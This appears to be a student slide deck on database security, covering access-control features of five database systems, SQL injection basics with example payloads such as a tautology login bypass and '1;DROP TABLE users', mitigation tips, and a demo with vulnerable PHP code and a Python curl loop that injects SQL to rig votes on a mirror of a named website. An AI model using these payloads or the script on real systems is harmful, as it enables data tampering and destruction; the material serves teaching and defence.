Database Security
Types of attacks and mitigation strategies
Group Members:
Tushar Sugandhi
Natthapol Prakongpan
Travis Whilden
Brendan Kohlar
Jonathan Reitnauer
Database Access Control
Part I
Review Databases
• IBM DB2
• Oracle
• Microsoft SQL Server
• MySQL
• PostgreSQL
Security Mechanisms
• Authentication
  – Who is allowed access to the instance and/or database
  – Where and how a user's password will be verified
• Authorization
  – The authority level that a user is granted
  – The commands that a user is allowed to run
  – The data that a user is allowed to read and/or alter
  – The database objects a user is allowed to create, alter, and/or drop
• Privileges
  – Granular authorization
IBM DB2 Authentication
– Works closely with the security features of the underlying operating system to verify user IDs and passwords.
– Can use Kerberos to authenticate users.
IBM DB2 Authorization
• Determine the operations that users and/or groups can perform.
• Determine the data objects that users can access.
• Five authority levels:
  – SYSADM
  – SYSCTRL
  – SYSMAINT
  – DBADM
  – LOAD
IBM DB2 Privileges
• More granular than authorities.
• Can be assigned to users and/or groups.
• Help define the objects that a user can create or drop.
• Help define the commands that a user can use to access objects (tables, views, indexes, packages).
Oracle Security
• Authentication (Identity Management)
• Virtual Private Database
• Oracle Label Security
  – Row Level Authentication
Oracle Identity Management
• LDAP Directory Service
• Directory integration and provision services
• Authentication and authorization services
• Certificate authority (CA)
Oracle Virtual Private Database
• Allow policy to be associated with specific columns in tables.
• Relevant Column and Masking
Oracle Label Security
• Provides a secure engine and data dictionary for managing access to data using sensitivity label.
• Row level security can be achieved with no programming required.
• Sensitivity labels are used to determine user’s ability to view and update data.
Microsoft SQL Server
• Authentication
• Access Permission
• Roles
MS SQL Authentication
• Two methods for user authentication
• Windows authentication
  – Default and preferred
  – Secure authentication with the underlying operating system
• SQL Server authentication
  – Strongly discouraged
  – Not as secure (clear-text password)
MS SQL Access Permission
• Statement Permissions
MS SQL Access Permission
• Object Permissions
MS SQL Roles
MySQL
• Limited Security Features
• Authentication
• Permission
MySQL Authentication
• User table/grant table in master database.
• Stored in plaintext.
• Can be viewed by anyone if not configured properly.
• No ties to OS.
• MySQL’s root has no password by default.
MySQL Permission
• Table level control
• Column level control
• No row level control
PostgreSQL Authentication
• Trust Authentication
  – OS-based
• Password Authentication
  – md5, crypt, or password through a user table
• Kerberos Authentication
  – Kerberos auth. server
• Ident-based Authentication
  – Username, password, machine, OS.
• Pluggable Authentication Module (PAM)
  – Custom authentication method.
PostgreSQL Permission
• Read
  – SELECT
• Append
  – INSERT
• Write
  – UPDATE/DELETE
• Rules
  – Allows a user to modify permission on a database.
  – Super user
Features Comparison

Feature          DB2               Oracle            MS SQL            MySQL               PostgreSQL
Authentication   Multiple / Good   Multiple / Good   OS / No Option    User Table / Poor   Multiple / Good
Permission       Good              Good              Good              Poor                Good
Row Level        View              Native            View              View                View
SQL INJECTION ATTACKS
THE BASICS
Part II
What is SQL Injection?
• A security vulnerability exploiting the application layer of the database
• Improperly handled user input injected into DBMS as SQL statements
Where is it Done?
• Potentially any field requiring user input!
  – Attacking either the user handle or the password in login authentication is the location most commonly associated with SQL Injection
Specifically…
• SQL Injection attacks can be broken down into the exploitation of two vulnerabilities
  – Improper removal of escape characters
  – Weak type enforcement
Vulnerability: Escape Characters
• When escape characters used in a SQL query/command are not properly filtered from user input
  – Triggers an escape sequence from the current query, such as setting a dummy value equal to itself
• The statement 'X = X' is always true
Example: Escape Characters Exploit
• Application prompts user for userName:
  – statement := "SELECT * FROM users WHERE name = '" + userName + "';"
• User injects partial SQL code into prompt:
  – a' or 't'='t
• statement becomes:
  – SELECT * FROM users WHERE name = 'a' or 't'='t';
• The OR condition always returns true
Vulnerability: Weak Type Enforcement
• When type constraints are not properly implemented for user input
  – Malicious user injects a data type for input that was not an intended value
Example: Weak Type Enforcement Exploit
• Application prompts user for a numeric value for row selection in the following code:
  – statement := "SELECT * FROM data WHERE id = " + a_variable + ";"
• User injects a string statement into the prompt:
  – 1;DROP TABLE users
• statement becomes:
  – SELECT * FROM data WHERE id = 1;DROP TABLE users;
• Execution deletes the users table from the database
Protection From Attack
• Sanitize the data
• Secure the application
• Safeguard the input
• Use stored procedures
Protection: Sanitize the Data
• More than simply adding backslashes!
  – Need a default-deny regular expression that lets through only the desired characters:
    • s/[^0-9a-zA-Z]//g strips everything except alphanumeric characters
– Strip quotation marks
Protection: Secure the Application
• People are the weakest link
  – Limit access to only those who need it!
  – Set each individual's access to the lowest required permissions
Protection: Safeguard the Input
• Check your database interface for input handling functions
  – Proper quote handling in string parsing
  – Deal with backslashes accordingly
Protection: Use Stored Procedures
• A viable alternative…
  – Resolves issues with dynamic input
  – Tailored to the specific needs of the database
DEMO
Part III
SQL Injection Demo
Attack a real website using SQL injection
SQL Injection Demo
• Bestthing.info: Comparing apples to oranges and oranges to racecars.
• User-driven content with database backend
• Quest to find the “best thing ever”
• Mirror of the site at injection.pycoder.net
Plan of attack
• Put a phrase at the top of the “Best” phrases
• Must get around the protection against duplicate ip addresses.
Site Code
HTML:

<form method="post" action="/">
  <div>
    <input name="tid0" value="27356" type="hidden" />
    <input name="tid1" value="35705" type="hidden" />
    <input name="A" type="submit" value="Having a funny hat" />
    or
    <input name="B" type="submit" value="Bs" />
    <br /><br />
    <input type="submit" name="d" value="Report this pair as a duplicate." />
  </div>
</form>

PHP:

mysql_query('INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES ('
    .ip2long($_SERVER['REMOTE_ADDR']).',now(),'
    .$_POST['tid0'].','.$_POST['tid1'].','
    .(isset($_POST['A'])?1:0).')');
if(mysql_affected_rows()>0) {
    mysql_query('UPDATE thing SET votesFor=votesFor+'.$forA.', votesTotal=votesTotal+1 WHERE tid='.$o);
    mysql_query('UPDATE thing SET votesFor=votesFor+'.($forA?0:1).', votesTotal=votesTotal+1 WHERE tid='.$t);
}
Attack Code
Python Script:
#!/usr/bin/python
import random, commands

x = [random.randint(4000,400000)]
for n in range(600):
    while True:
        p = random.randint(4000,400000)
        if not p in x:
            x.append(p)
            break
    commands.getoutput((r"curl -d tid0=%i,%i,1\)\ # -d tid1=-1\ or\ "
                        + r"thing=\'test\' -d B=submit "
                        + r"http://injection.pycoder.net") % (x[-2],x[-1]))
Thank you !!!